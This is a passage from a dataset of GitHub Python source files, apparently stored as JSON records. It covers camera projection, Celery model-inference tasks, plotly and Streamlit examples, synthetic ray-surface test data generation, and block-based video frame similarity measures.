cv2.decomposeProjectionMatrix(P.cpu().detach().numpy())\n c = c[:3, 0] / c[3]\n t = - R @ c\n\n # ensure unique scaling of K matrix\n K = K / K[2,2]\n \n self.camera.K = torch.from_numpy(K).to(self.device)\n self.camera.R = torch.from_numpy(R).to(self.device)\n self.camera.t = torch.from_numpy(t).to(self.device)\n \n def project(self, points, depth_as_distance=False):\n \"\"\" Project points to the view's image plane according to the equation x = K*(R*X + t).\n\n Args:\n points (torch.tensor): 3D Points (A x ... x Z x 3)\n depth_as_distance (bool): Whether the depths in the result are the euclidean distances to the camera center\n or the Z coordinates of the points in camera space.\n \n Returns:\n pixels (torch.tensor): Pixel coordinates of the input points in the image space and \n the points' depth relative to the view (A x ... 
x Z x 3).\n \"\"\"\n\n # \n points_c = points @ torch.transpose(self.camera.R, 0, 1) + self.camera.t\n pixels = points_c @ torch.transpose(self.camera.K, 0, 1)\n pixels = pixels[..., :2] / pixels[..., 2:]\n depths = points_c[..., 2:] if not depth_as_distance else torch.norm(points_c, p=2, dim=-1, keepdim=True)\n return torch.cat([pixels, depths], dim=-1)\n","repo_name":"snuvclab/chupa","sub_path":"src/normal_nds/nds/core/view.py","file_name":"view.py","file_ext":"py","file_size_in_byte":11295,"program_lang":"python","lang":"en","doc_type":"code","stars":73,"dataset":"github-code","pt":"21"} +{"seq_id":"31862851331","text":"class sieunhangao:\n suc_manh = 100100\n def __init__(self, para_ten, para_vukhi, para_mau):\n self .ten = \"sieu nhan \" + para_ten\n self .vukhi = para_vukhi\n self .mau = para_mau\nclass sieunhanx(sieunhangao) :\n suc_manh = 20000\n def __init__(self, para_ten, para_vukhi, para_mau,para_thu):\n #self .ten = \"sieu nhan \" + para_ten\n #self .vukhi = para_vukhi\n #self .mau = \n super().__init__(para_ten, para_vukhi, para_mau )\n self .thu = para_thu\n\n\nsieu_nhan_con = sieunhanx('do','vang','xanh','5831')\nprint(sieu_nhan_con.__dict__)","repo_name":"chauhoagnhat/Hoc-Lap-Trinh","sub_path":"oop_4.py","file_name":"oop_4.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"13812913767","text":"import importlib\nimport logging\nfrom celery import Task\nimport os\nfrom typing import List, Any, Dict\n\nfrom .worker import app\n\n\nclass ModelInferenceTask(Task):\n \"\"\"\n Abstraction of Celery's Task class to support loading ML model.\n \"\"\"\n\n abstract = True\n\n def __init__(self):\n super().__init__()\n self.model = None\n\n def __call__(self, *args, **kwargs):\n \"\"\"\n Load model on first call (i.e. 
first task processed)\n Avoids the need to load model on each task request\n \"\"\"\n if not self.model:\n logging.info(\"Loading Model...\")\n module_import = importlib.import_module(self.path[0])\n model_obj = getattr(module_import, self.path[1])\n self.model = model_obj(**self.model_args)\n logging.info(\"Model loaded\")\n return self.run(*args, **kwargs)\n\n\n@app.task(\n ignore_result=False,\n bind=True,\n base=ModelInferenceTask,\n path=(\"ml_worker_app.transcribe\", \"WhisperModel\"),\n model_args={\n \"name\": \"base\",\n \"language\": \"\",\n \"device\": \"cpu\",\n },\n name=\"{}.{}\".format(__name__, \"Whisper\"),\n)\ndef whisper_inference(\n self, data: List[int], task=\"transcribe\", language=None\n) -> Dict[str, Any]:\n \"\"\"\n Transcribe audio data using the Whisper model\n \"\"\"\n\n return self.model.predict([data], task=task, language=language) | {\"task\": task}\n\n\n@app.task(\n ignore_result=False,\n bind=True,\n base=ModelInferenceTask,\n path=(\"ml_worker_app.TTS\", \"TTSModel\"),\n model_args={\n \"tts_model\": \"speechbrain/tts-tacotron2-ljspeech\",\n \"vocoder_model\": \"speechbrain/tts-hifigan-ljspeech\",\n \"device\": \"cpu\",\n },\n name=\"{}.{}\".format(__name__, \"TTS\"),\n)\ndef text_to_speech(self, text: str | List[str]) -> Dict[str, Any]:\n \"\"\"\n Synthesize speech from text using the TTS model(s)\n \"\"\"\n return self.model.predict(text)\n\n\n@app.task(\n ignore_result=False,\n bind=True,\n base=ModelInferenceTask,\n path=(\"ml_worker_app.gpt\", \"GPTModel\"),\n model_args={\n # \"openai_api_key\": os.environ.get(\"OPENAI_API_KEY\"),\n \"model_name\": \"text-curie-001\",\n },\n name=\"{}.{}\".format(__name__, \"GPT\"),\n)\ndef gpt_prompt(\n self, text: str, source_language: str, target_language: str\n) -> Dict[str, Any]:\n \"\"\"\n Translate text from the source language to the target language using the GPT model\n \"\"\"\n return self.model.predict(text, source_language, target_language)\n","repo_name":"MoPl90/Speech_Translator","sub_path":"model_server/ml_worker_app/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":2453,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"70119525814","text":"import plotly.graph_objects as go\n\nfig = go.Figure()\n\n# Create scatter trace of text labels\nfig.add_trace(go.Scatter(\n x=[1.5, 3],\n y=[2.5, 2.5],\n text=[\"Rectangle reference to the plot\",\n \"Rectangle reference to the axes\"],\n mode=\"text\",\n))\n\n# Set axes properties\nfig.update_xaxes(range=[0, 4])\nfig.update_yaxes(range=[0, 4])\n\n# Add shapes\nfig.add_shape(type=\"rect\",\n xref=\"x\", yref=\"y\",\n x0=2.5, y0=0,\n x1=3.5, y1=2,\n line=dict(\n color=\"RoyalBlue\",\n width=3,\n ),\n fillcolor=\"LightSkyBlue\",\n)\nfig.add_shape(type=\"rect\",\n xref=\"paper\", yref=\"paper\",\n x0=0.25, y0=0,\n x1=0.5, y1=0.5,\n line=dict(\n color=\"LightSeaGreen\",\n width=3,\n ),\n fillcolor=\"PaleTurquoise\",\n)\n\nfig.show()","repo_name":"ebtrader/corefinta_scratchpad","sub_path":"forecasted_weekly_candle/forecasted_with_different_assumptions/rect.py","file_name":"rect.py","file_ext":"py","file_size_in_byte":759,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"23889919898","text":"from string import digits\r\nimport random\r\nimport streamlit as st\r\nimport pandas as pd\r\n\r\ndef intersection(lst1, lst2):\r\n # despite its name, this returns the elements of lst1 that are NOT in lst2 (a set difference)\r\n lst3 = [value for value in lst1 if value not in lst2]\r\n return lst3\r\n# callback function to change the random number stored in state\r\ndef 
change_player_numbers():\r\n st.session_state[\"random_nos\"] = random.sample(range(len_of_refined_list),len_of_refined_list)\r\n return\r\nst.set_page_config(page_title=\"pick my players\")\r\ncolstitle1,colstitle2,colstitle3 = st.columns(3)\r\ncolstitle2.title(\"PMP v1.0\")\r\ncolstitle2.text(\"Pick My Players\")\r\nm = st.markdown(\"\"\"\r\n\"\"\", unsafe_allow_html=True)\r\n\r\nget_players_names = st.text_area(\"Enter Player Names: \",\"\")#\r\nif get_players_names != \"\":\r\n get_players_names_raw = get_players_names.split('.')[1:]\r\n #print(get_players_names_raw)\r\n get_players_names_refined = []\r\n for player_name_raw in get_players_names_raw:\r\n remove_digits = str.maketrans('', '', digits)\r\n res = player_name_raw.translate(remove_digits)\r\n get_players_names_refined.append(res.replace(\" \",\"\"))\r\n print(get_players_names_refined)\r\n if len(get_players_names_refined) >= 8:\r\n len_of_refined_list = len(get_players_names_refined)\r\n game = st.selectbox('Game Type',['8 v 8','7 v 7','6 v 6','5 v 5','4 v 4'])\r\n \r\n if game == '8 v 8':\r\n game_no = 8\r\n elif game == '7 v 7':\r\n game_no = 7\r\n elif game == '6 v 6':\r\n game_no = 6\r\n elif game == '5 v 5':\r\n game_no = 5\r\n elif game == '4 v 4':\r\n game_no = 4\r\n else:\r\n game_no = 0\r\n \r\n col1button, col2button, col3button = st.columns(3)\r\n if game_no*2 > len(get_players_names_refined):\r\n col2button.write(\"Select a different\\n\\nGame Type,\\nPlayers are Less\")\r\n else:\r\n ## button to generate a new random player_numbers\r\n col2button.button(\"Generate Team Captain Names and Player Nos\", on_click=change_player_numbers)\r\n # initializing with a random number\r\n #if \"random_nos\" not in st.session_state:\r\n #st.session_state[\"random_nos\"] = []#random.sample(range(len_of_refined_list),len_of_refined_list)\r\n \r\n try:\r\n random_nos = st.session_state.random_nos\r\n generate_player_number_random = {}\r\n for idx,player_name in enumerate(get_players_names_refined):\r\n generate_player_number_random[random_nos[idx]] = player_name\r\n remove_list = [0,1]\r\n\r\n get_players_key = [i for i in list(generate_player_number_random.keys()) if i not in remove_list]#list(generate_player_number_random.keys())\r\n\r\n p1 = []\r\n p2 = []\r\n col1, col2 = st.columns(2)\r\n with col1:\r\n st.subheader(\"Team 1 Captain : \"+generate_player_number_random[0])\r\n p1 = st.multiselect(generate_player_number_random[0]+\" Pick \"+str(game_no-1)+\" Player #'s\",get_players_key, key = \"p1\")\r\n #st.write('You selected:', p1)\r\n\r\n with col2:\r\n st.subheader(\"Team 2 Captain : \"+generate_player_number_random[1])\r\n if len(p1) == game_no-1:\r\n p2 = st.multiselect(generate_player_number_random[1]+\" Pick \"+str(game_no-1)+\" Player #'s\",intersection(get_players_key,p1), key = \"p2\")\r\n else:\r\n p2 = st.multiselect(generate_player_number_random[1]+\" Pick \"+str(game_no-1)+\" Player #'s\",[], key = \"p2\")\r\n #st.write('You selected:', p2)\r\n get_selected_player_1_team = {}\r\n get_selected_player_2_team = {}\r\n for p_1 in p1:\r\n get_selected_player_1_team[p_1] = generate_player_number_random[p_1]\r\n for p_2 in p2:\r\n get_selected_player_2_team[p_2] = generate_player_number_random[p_2]\r\n if len(p1) == len(p2):\r\n col1show, col2show, col3show = st.columns(3)\r\n if col2show.button(\"Show Players\"):\r\n team1 = pd.DataFrame(get_selected_player_1_team.items(), columns=['Players #', 'Players Names'])\r\n col1.table(team1)\r\n team2 = pd.DataFrame(get_selected_player_2_team.items(), columns=['Players #', 
'Players Names'])\r\n col2.table(team2)\r\n st.balloons()\r\n else:\r\n col2show.text(\"\")\r\n except:\r\n st.write(\"Click On Generating Team Captain Names and Players Nos\")\r\n else:\r\n st.write(\"Please Enter @ Least 8 Players\")\r\nwith st.expander(\"How to Use the App\"):\r\n colstep1, colstep2, colstep3 = st.columns(3)\r\n colstep1.text(\"Copy Final List\\nFrom WhatsApp Group and\\npaste in the text area, as shown\\nbelow: \\nSunday 6-8pm \\nPlace - Turfside - booked\\n\\n1. player I \\n2. player II \\n3. player III \\n4. player IV \\n5. player V \\n6. player VI \\n7. player VII \\n8. player VIII \\n9. player IX \\n10. player X \\n11. player XI \\n12. player XII \\n13. player XIII \\n14. player XIV +I \\n15. player XV \\n\\nWaitlist \\n1. player M\")\r\n colstep3.text(\"Delete\\nDate, Waitlist Location,\\nJust Keep\\nthe Main Players, as shown\\nbelow: \\n\\n1. player I \\n2. player II \\n3. player III \\n4. player IV \\n5. player V \\n6. player VI \\n7. player VII \\n8. player VIII \\n9. player IX \\n10. player X \\n11. player XI \\n12. player XII \\n13. player XIII \\n14. player XIV +I \\n15. player XV\")\r\n st.text(\"Click on Button to Generate Captain and Player Numbers\")\r\n st.text(\"Team Captain 1 can pick his/her Players based on the Game Type\")\r\n st.text(\"Team Captain 2 Can ONLY pick his/her Players\\nafter Team Captain 1 [Option will be available then]\")\r\n","repo_name":"sohailehiz/team_selector","sub_path":"player_select.py","file_name":"player_select.py","file_ext":"py","file_size_in_byte":6115,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38987582555","text":"import numpy as np\nimport os\nimport time\nfrom matplotlib import pyplot as plt\nfrom mpl_toolkits.mplot3d.art3d import Poly3DCollection\nfrom numpy import array\n\n#Configuration parameters\n#------------------------------\n#- surface intervals\nx_min, x_max = 100, 3100\ny_min, y_max = 200, 2700\n#- number of triangles and rays\ndefault_num_triangles = 30000\ndefault_num_rays = 10000000\n#- enable/disable visualisation\nvisualise_surface = True\n#------------------------------\n\n#define spatial frequencies (w = 2*pi*f) for surface undulation\nw = 2 * np.pi * np.array(\n [0.0487, 0.0912,\n 0.0125, 0.0318,\n 0.00672, 0.00543,\n 0.00196, 0.00282,\n 0.000571, 0.000386,\n 0.000345, 0.000571,\n 0.000251, 0.000145,\n 0.000208, 0.000139])\n\n#method to compute surface elevation using an analytic expression\ndef f_xy(x, y):\n return 1 * (np.cos(w[0]*x) + np.cos(w[1]*y)) \\\n + 2 * (np.cos(w[2]*x - 0.3*np.pi) + np.cos(w[3]*y - 0.7*np.pi)) + \\\n + 2.5 * (np.cos(w[4]*x + 1.2*np.pi) + np.cos(w[5]*y - 1.83*np.pi)) + \\\n - 1.8 * (np.cos(w[6]*x + 2.93*np.pi) + np.cos(w[7]*y - 0.67*np.pi)) + \\\n + 5 * (np.cos(w[8]*x + 0.04*np.pi) + np.cos(w[9]*y - 1.05*np.pi)) + \\\n + 25 * (np.cos(w[10]*x - 0.61*np.pi) + np.cos(w[11]*y + 0.51*np.pi)) + \\\n + 4 * (np.cos(w[12]*x - 0.61*np.pi) * np.cos(w[13]*y + 0.51*np.pi)) + \\\n + 1.3 * (np.cos(w[14]*x * w[15]*y + 0.12*np.pi)) + \\\n + 3 * np.sin(0.642*w[15]*y - 0.573*w[14]*x)\n\n#method to plot mesh surface\ndef draw_mesh_surface(vertices, triangles, heading=None,\n rgb_base=np.r_[0,0,1], colornoise=0.35, randseed=4562):\n fig = plt.figure(figsize=(8,6))\n ax = fig.add_subplot(111, projection='3d')\n mesh_polys = [[vertices[t] for t in tri] for tri in triangles]\n np.random.seed(randseed)\n fc = (1 - colornoise) * rgb_base + colornoise * np.random.rand(len(triangles),3)\n 
ax.add_collection3d(Poly3DCollection(mesh_polys, facecolors=fc, linewidths=1))\n xyz_min = np.min(vertices, axis=0)\n xyz_max = np.max(vertices, axis=0)\n ax.set_xlim(xyz_min[0], xyz_max[0])\n ax.set_ylim(xyz_min[1], xyz_max[1])\n ax.set_zlim(xyz_min[2], xyz_max[2])\n if heading is not None:\n plt.title(heading)\n\n#method to locate triangles well inside the surface\ndef well_within_boundary(centroids, x_min, x_range, y_min, y_range, percent):\n return (centroids[:,0] > x_min + percent * x_range) & \\\n (centroids[:,0] < x_min + (1 - percent) *x_range) & \\\n (centroids[:,1] > y_min + percent * y_range) & \\\n (centroids[:,1] < y_min + (1 - percent) * y_range)\n\n#API for creating a surface and saving the data in binary format\ndef synthesize_data(outdir,\n n_triangles_approx=default_num_triangles,\n n_rays=default_num_rays,\n show_graphics=True,\n save_results_in_binary=True,\n skip_ground_truth=False,\n perturb_centroid=False,\n feedback=dict()):\n x_range = x_max - x_min\n y_range = y_max - y_min\n aspect = y_range / x_range\n n_vertices_approx = int(n_triangles_approx / 2)\n\n #discretisation\n nX = int(np.sqrt(n_vertices_approx / aspect))\n nY = int(aspect * nX)\n xi = np.linspace(x_min, x_max, nX)\n yi = np.linspace(y_min, y_max, nY)\n delta = min(xi[1] - xi[0], yi[1] - yi[0])\n #add some noise to perturb xy coordinates\n np.random.seed(7065)\n noise_x = 0.25 * delta * (np.random.rand(nX) - 0.5)\n noise_y = 0.25 * delta * (np.random.rand(nY) - 0.5)\n xi += noise_x\n yi += noise_y\n\n #create mesh surface\n vertices = []\n triangles = []\n for y in yi:\n for x in xi:\n vertices.append([x, y, f_xy(x,y)])\n\n for y in range(nY-1):\n for x in range(nX-1):\n #vertices are ordered consistently in clockwise direction\n triangles.append([y*nX+x, y*nX+x+1, (y+1)*nX+x])\n triangles.append([y*nX+x+1, (y+1)*nX+x+1, (y+1)*nX+x])\n\n vertices = np.array(vertices, dtype=float)\n vertices[:,-1] -= min(vertices[:,-1])\n triangles = np.array(triangles, dtype=int)\n\n feedback['nVertices'] = len(vertices)\n feedback['nTriangles'] = len(triangles)\n feedback['nRays'] = n_rays\n\n if show_graphics:\n draw_mesh_surface(vertices, triangles, 'Simulated surface')\n plt.show()\n\n #compute centroids and normal vectors for surface patches\n centroids = []\n normals = []\n for t in triangles:\n n = np.cross(vertices[t[1]] - vertices[t[0]],\n vertices[t[2]] - vertices[t[0]])\n normals.append(n / np.linalg.norm(n))\n centroids.append(np.mean(vertices[t], axis=0))\n\n normals = np.array(normals)\n centroids = np.array(centroids)\n if perturb_centroid:\n np.random.seed(9571)\n a1 = 0.2 * (np.random.rand(n_rays) - 0.5)\n a2 = 0.2 * (np.random.rand(n_rays) - 0.5)\n for i, t in enumerate(triangles):\n centroids[i] += a1[i] * (vertices[t[1]] - vertices[t[0]]) \\\n + a2[i] * (vertices[t[2]] - vertices[t[0]])\n\n #create rays\n #idea: Line segment starts from \"centroid - (k/2) * normal\"\n # and extends for distance k*rand() in the normal direction.\n # In the end, about half will intersect the surface.\n #- rand() generates random variates in union{(0,0.498],[0.502,1]}\n # introduce deadzone (0.498,0.502) to make the result unambiguous.\n def rand(n):\n r = np.random.rand(n)\n r[r < 0.5] *= 0.996\n r[r >= 0.5] = 0.502 + (r[r >= 0.5] - 0.5) * 0.996\n return r\n\n np.random.seed(8215)\n r = rand(n_rays)\n s = 0.6 + 0.4 * np.random.rand(n_rays) #stochastic segment length scaling factor\n t = np.random.randint(len(triangles), size=n_rays) #random triangle selections\n rayFrom = []\n rayTo = []\n lower = []\n upper = []\n 
crossing = []\n max_segment_length = 4 * delta\n magnitude = max_segment_length * s\n lower = -0.5 * magnitude\n upper = r * magnitude\n rayFrom = centroids[t] + lower[:,np.newaxis] * normals[t]\n rayTo = rayFrom + upper[:,np.newaxis] * normals[t]\n crossing = np.array(r > 0.5, dtype=np.int32)\n\n if show_graphics:\n M = min(200, n_rays)\n #- visualise first 200 rays relative to surface\n plt.plot([range(M), range(M)], [lower[:M], lower[:M] + upper[:M]])\n plt.plot([0,M], [0,0], 'k')\n plt.title('Illustration: Rays that cross the surface rise above y=0')\n plt.show()\n #- cdf\n plt.plot(np.sort(r), np.arange(n_rays)/n_rays)\n plt.ylabel('cdf')\n plt.xlabel('r')\n plt.title(r\"y(r=0.5) $\\rightarrow$ proportion of rays that don't intersect the surface\")\n plt.axis('tight')\n plt.grid(True)\n plt.show()\n #- show some rays piercing through the surface\n '''\n from mpl_toolkits.mplot3d.art3d import Line3DCollection\n draw_mesh_surface(vertices, triangles, 'Some rays (red) intersecting, (green) not intersecting the surface')\n for c,v in zip(['g', 'r'], [0, 1]):\n margin = 0.2 if v == 1 else 0\n idx = np.where((crossing == v) & well_within_boundary((rayFrom + rayTo)/2.,\n x_min, x_range, y_min, y_range, margin))[0][:25]\n ls = np.hstack([rayFrom[idx], rayTo[idx]]).copy()\n ls = ls.reshape((-1,2,3))\n lc = Line3DCollection(ls, linewidths=2, colors=c)\n plt.gca().add_collection(lc)\n plt.gca().scatter(rayTo[idx,0], rayTo[idx,1], rayTo[idx,2], c=c)\n plt.show()\n '''\n\n #shift the coordinates to anonymise data and preserve precision as float32\n xyz_min = np.min(vertices, axis=0)\n vertices -= xyz_min\n rayFrom -= xyz_min\n rayTo -= xyz_min\n\n #write data to bin files\n if not os.path.exists(outdir):\n os.makedirs(outdir)\n\n fw = lambda f: os.path.join(outdir, f)\n t0 = time.time()\n verts = np.array(vertices.flatten(),'float32')\n tris = np.array(triangles.flatten(),'int32')\n pFrom = np.array(rayFrom.flatten(),'float32')\n pTo = np.array(rayTo.flatten(),'float32')\n with open(fw('vertices_f32'), 'wb') as f:\n verts.tofile(f)\n with open(fw('triangles_i32'), 'wb') as f:\n tris.tofile(f)\n with open(fw('rayFrom_f32'), 'wb') as f:\n pFrom.tofile(f)\n with open(fw('rayTo_f32'), 'wb') as f:\n pTo.tofile(f)\n t1 = time.time()\n print('Essential files written in {}s'.format(t1 - t0))\n '''\n np.savetxt(fw('vertices.csv'), verts, delimiter=',', fmt='%.6f')\n np.savetxt(fw('triangles.csv'), tris, delimiter=',', fmt='%d')\n np.savetxt(fw('rayFrom.csv'), pFrom, delimiter=',', fmt='%.6f')\n np.savetxt(fw('rayTo.csv'), pTo, delimiter=',', fmt='%.6f')\n '''\n if skip_ground_truth:\n return\n print('Saving ground-truth...')\n if save_results_in_binary:\n with open(fw('ground_truth'), 'wb') as f:\n crossing.tofile(f)\n if perturb_centroid:\n intercepts = centroids[t] - xyz_min\n intercepts[crossing==0] = 0\n intersect_triangle = t\n intersect_triangle[crossing==0] = -1\n with open(fw('intercepts'), 'wb') as f:\n np.array(intercepts.flatten(),'float32').tofile(f)\n with open(fw('intersect_triangle'), 'wb') as f:\n np.array(intersect_triangle.flatten(),'int32').tofile(f)\n else:\n np.savetxt(fw('ground_truth.csv'), crossing, fmt='%d', delimiter=',')\n\n\nif __name__ == \"__main__\":\n outdir = os.path.join(os.getcwd().replace('scripts', 'input'))\n synthesize_data(outdir, 
show_graphics=visualise_surface)\n","repo_name":"acfr/gpu-ray-surface-intersection-in-cuda","sub_path":"scripts/input_synthesis.py","file_name":"input_synthesis.py","file_ext":"py","file_size_in_byte":9691,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"29255060428","text":"from turtle import*\r\nfrom math import*\r\nfrom random import*\r\npenup()\r\nr=[]\r\ndef radius(n,m):#n=number of vertices, m=length of one side\r\n return (m/2)*(1/(sin(pi/n)))\r\n\r\ndef is_pile_up(x1,y1,r1,x2,y2,r2):\r\n if x1==x2 and y1==y2:#when the x and y coordinates are the same\r\n return False\r\n n=sqrt((x2-x1)**2+(y2-y1)**2)\r\n if n>abs(r1-r2) and n<abs(r1+r2):\r\n return True\r\n if n>abs(r1+r2) or n<abs(r1-r2):\r\n return False\r\n edge_indices = np.where(block > b_mean)[0]\n edge_pattern[edge_indices] = 1\n \n return edge_pattern\n\n####################################\n# 3.1.1 - Categorization of Blocks #\n####################################\n\ndef get_q_value(block):\n \"\"\"\n Finds the q value (number of pixels in a block higher than the block mean)\n \"\"\"\n\n mean = block_mean(block)\n q_value = np.where(block > mean)[0].shape[0]\n \n return q_value\n\ndef get_q_prime_value(block):\n \"\"\"\n Computes q prime value (number of edge pixels in a nonedge block)\n\n Parameters\n ----------\n block: array of shape (N, )\n The non-edge block whose edge pattern is examined\n\n Returns\n -------\n q_prime: float\n The number of edge pixels in the nonedge block\n \"\"\"\n edge_pattern = get_block_edge_pattern(block)\n\n q_prime_value = np.where(edge_pattern == 1)[0].shape[0]\n\n return q_prime_value\n\ndef lower_mean(block):\n \"\"\"\n Computes the lower mean for a single block in a grayscale image\n\n Parameters\n ----------\n block: array of shape (N, )\n A single block that exists in the grayscale image\n \n Returns\n -------\n lower_mean: float\n The lower mean for the block\n \"\"\"\n\n mean = block_mean(block)\n q = get_q_value(block)\n summation_indices = np.where(block < mean)[0]\n summation = np.sum(block[summation_indices])\n\n lower_mean = (1 / (16 - q)) * summation \n\n return lower_mean \n\ndef higher_mean(block):\n \"\"\"\n Computes the higher mean for a single block in a grayscale image\n\n Parameters\n ----------\n block: array of shape (N, )\n A single block that exists in the grayscale image\n \n Returns\n -------\n higher_mean: float\n The higher mean for the block\n \"\"\"\n\n mean = block_mean(block)\n q = get_q_value(block)\n summation_indices = np.where(block >= mean)[0]\n summation = np.sum(block[summation_indices])\n\n higher_mean = (1 / q) * summation\n\n return higher_mean\n\ndef is_edge_block(edge_pattern):\n \"\"\"\n Determines whether a block is an edge or nonedge block\n\n Parameters\n ----------\n edge_pattern: array of shape (N, )\n The edge pattern for a block\n\n Returns\n -------\n is_edge_block: boolean\n\n Notes\n -------\n 8 is used because the frames we are using can be split perfectly; therefore, each block will contain 16 pixels.\n If over 8 pixels are a 1, then it is an edge block\n \"\"\"\n num_edge_pixels = np.nonzero(edge_pattern)[0].shape[0]\n \n is_edge_block = num_edge_pixels > 8\n \n return is_edge_block\n\n\n###########################\n# 3.2 Similarity Measures #\n###########################\n\ndef diff_both_edge_blocks(block_1, block_2):\n \"\"\"\n Computes the difference between two edge blocks\n \"\"\"\n # Get block means\n m1 = block_mean(block_1)\n m2 = block_mean(block_2)\n # Get q values for each block\n q1 = get_q_value(block_1)\n q2 = get_q_value(block_2)\n # Get lower_mean for each block\n lm1 = lower_mean(block_1)\n lm2 = lower_mean(block_2)\n 
# Get higher_mean for each block\n hm1 = higher_mean(block_1)\n hm2 = higher_mean(block_2)\n\n # \"t\" stands for term\n t1 = np.abs((q1 - q2) * (hm1 - hm2))\n t2 = np.abs(lm1 - lm2) + np.abs(hm1 - hm2)\n \n diff = t1 * t2\n\n return diff\n\n\ndef diff_both_nonedge_blocks(block_1, block_2):\n \"\"\"\n Computes the difference between two nonedge blocks\n \"\"\"\n # Get block means\n m1 = block_mean(block_1)\n m2 = block_mean(block_2)\n # Get q values for each block\n q1 = get_q_prime_value(block_1)\n q2 = get_q_prime_value(block_2)\n\n # \"t\" stands for term\n t1 = np.abs(q1 - q2)\n t2 = np.abs(m1 - m2)\n\n diff = 2 * t1 * t2 \n\n return diff\n\ndef diff_edge_nonedge(block_1, block_2):\n \"\"\"\n Computes the difference between an edge block and a non-edge block\n\n Parameters\n ----------\n block_1: array of type uint8 and shape (N, )\n the edge block\n block_2: array of shape (N, )\n the non-edge block\n\n Returns\n -------\n diff: float\n a similarity measure\n \"\"\"\n # Get the non-edge block mean\n m2 = block_mean(block_2)\n # Get q value for block 1 and q prime value for block 2\n q1 = get_q_value(block_1)\n q2 = get_q_prime_value(block_2)\n # Get lower and higher mean for block 1\n lm1 = lower_mean(block_1)\n hm1 = higher_mean(block_1)\n\n # \"t\" stands for term\n t1 = np.abs(q1 - q2)\n t2 = np.abs(lm1 + hm1 - (2 * m2))\n\n diff = t1 * t2 \n\n return diff\n\ndef diff_nonedge_edge(block_1, block_2):\n \"\"\"\n Computes the difference between an edge block and a non-edge block\n\n Parameters\n ----------\n block_1: array of type uint8 and shape (N, )\n the non-edge block\n block_2: array of shape (N, )\n the edge block\n\n Returns\n -------\n diff: float\n a similarity measure\n \"\"\"\n # Get mean of non-edge block\n m1 = block_mean(block_1)\n # Get q values\n q1 = get_q_prime_value(block_1)\n q2 = get_q_value(block_2)\n # Get lower and higher mean for block 2\n lm2 = lower_mean(block_2)\n hm2 = higher_mean(block_2)\n\n # \"t\" stands for term\n t1 = np.abs(q1 - q2)\n t2 = np.abs((2 * m1) - (lm2 + hm2))\n\n diff = t1 * t2\n\n return diff\n\ndef frame_blocks_perfect(frame_1, frame_2):\n \"\"\"\n Splits each frame into (4 x 4) blocks. 
Each dimension for each frame must be perfectly divisible by 4.\n \"\"\"\n # Both frames will have same shape\n rows, cols = frame_1.shape\n\n if rows < 4 or cols < 4:\n raise ValueError(\"Frame must have a larger shape than (4, 4)\")\n\n num_blocks_down = int(rows / 4)\n num_blocks_across = int(cols / 4)\n\n # This array's shape[0] should be divisible by 4 with remainder 0\n perfect_blocks_1 = np.zeros(shape=(1, 4))\n perfect_blocks_2 = np.zeros(shape=(1, 4))\n # Split array into groups of 4 rows\n lower_row = 0\n higher_row = 4\n step = 4\n # make sure to delete the first row of zeros after loop\n while higher_row <= rows:\n row_group_1 = frame_1[np.arange(lower_row, higher_row),:]\n row_group_2 = frame_2[np.arange(lower_row, higher_row),:]\n lower_col = 0\n higher_col = 4\n while higher_col <= cols:\n block_1 = row_group_1[:,np.arange(lower_col, higher_col)]\n block_2 = row_group_2[:,np.arange(lower_col, higher_col)]\n perfect_blocks_1 = np.vstack((perfect_blocks_1, block_1))\n perfect_blocks_2 = np.vstack((perfect_blocks_2, block_2))\n lower_col += step\n higher_col += step\n lower_row += step\n higher_row += step\n \n # Delete the leading zeros placeholder\n perfect_blocks_1 = np.delete(perfect_blocks_1, 0, axis=0)\n perfect_blocks_2 = np.delete(perfect_blocks_2, 0, axis=0)\n\n return perfect_blocks_1, perfect_blocks_2\n\n\ndef frame_blocks_extra(frame_1, frame_2):\n \"\"\"\n Splits each frame into (4 x 4) blocks\n\n Notes\n ------\n If there were extra rows, then I considered all cols and made\n blocks of size num_extra_rows x 4. If there were any remaining columns, I discarded them.\n If there were extra cols, then I considered all rows up to, but not including, the start of\n the extra rows and made blocks of size 4 x num_extra_cols. \n\n I split the frame into 3 regions to handle frames whose size is not perfectly divisble by 16 (4 x 4)\n \"\"\"\n # Both frames will have same shape\n rows, cols = frame_1.shape\n\n if rows < 4 or cols < 4:\n raise ValueError(\"Frame must have a larger shape than (4, 4)\")\n \n num_blocks_across = int(cols / 4)\n extra_width = cols % 4\n\n num_blocks_down = int(rows / 4)\n extra_height = rows % 4\n # There should be num_blocks_across * num_blocks_down perfect blocks. 
The vars above are for testing\n\n # Consider all blocks that fit perfectly first (Region 1)\n # This array's shape[0] should be divisible by 4 with remainder 0\n perfect_blocks_1 = np.zeros(shape=(1, 4))\n perfect_blocks_2 = np.zeros(shape=(1, 4))\n # Split array into groups of 4 rows\n lower_row = 0\n higher_row = 4\n step = 4\n # make sure to delete the first row of zeros after loop\n while higher_row <= rows:\n row_group_1 = frame_1[np.arange(lower_row, higher_row),:]\n row_group_2 = frame_2[np.arange(lower_row, higher_row),:]\n lower_col = 0\n higher_col = 4\n while higher_col <= cols:\n block_1 = row_group_1[:,np.arange(lower_col, higher_col)]\n block_2 = row_group_2[:,np.arange(lower_col, higher_col)]\n perfect_blocks_1 = np.vstack((perfect_blocks_1, block_1))\n perfect_blocks_2 = np.vstack((perfect_blocks_2, block_2))\n lower_col += step\n higher_col += step\n lower_row += step\n higher_row += step\n \n # Delete the leading zeros placeholder\n perfect_blocks_1 = np.delete(perfect_blocks_1, 0, axis=0)\n perfect_blocks_2 = np.delete(perfect_blocks_2, 0, axis=0)\n\n # Get the blocks of the extra rows (Region 2)\n start_index = higher_row - step\n extra_rows_blocks_1 = None\n extra_rows_blocks_2 = None\n lower_col = 0\n higher_col = 4\n if start_index < rows:\n extra_rows_blocks_1 = np.zeros(shape=(rows - start_index, 4))\n extra_rows_blocks_2 = np.zeros(shape=(rows - start_index, 4))\n extra_rows_group_1 = np.delete(frame_1, np.arange(0, start_index), axis=0)\n extra_rows_group_2 = 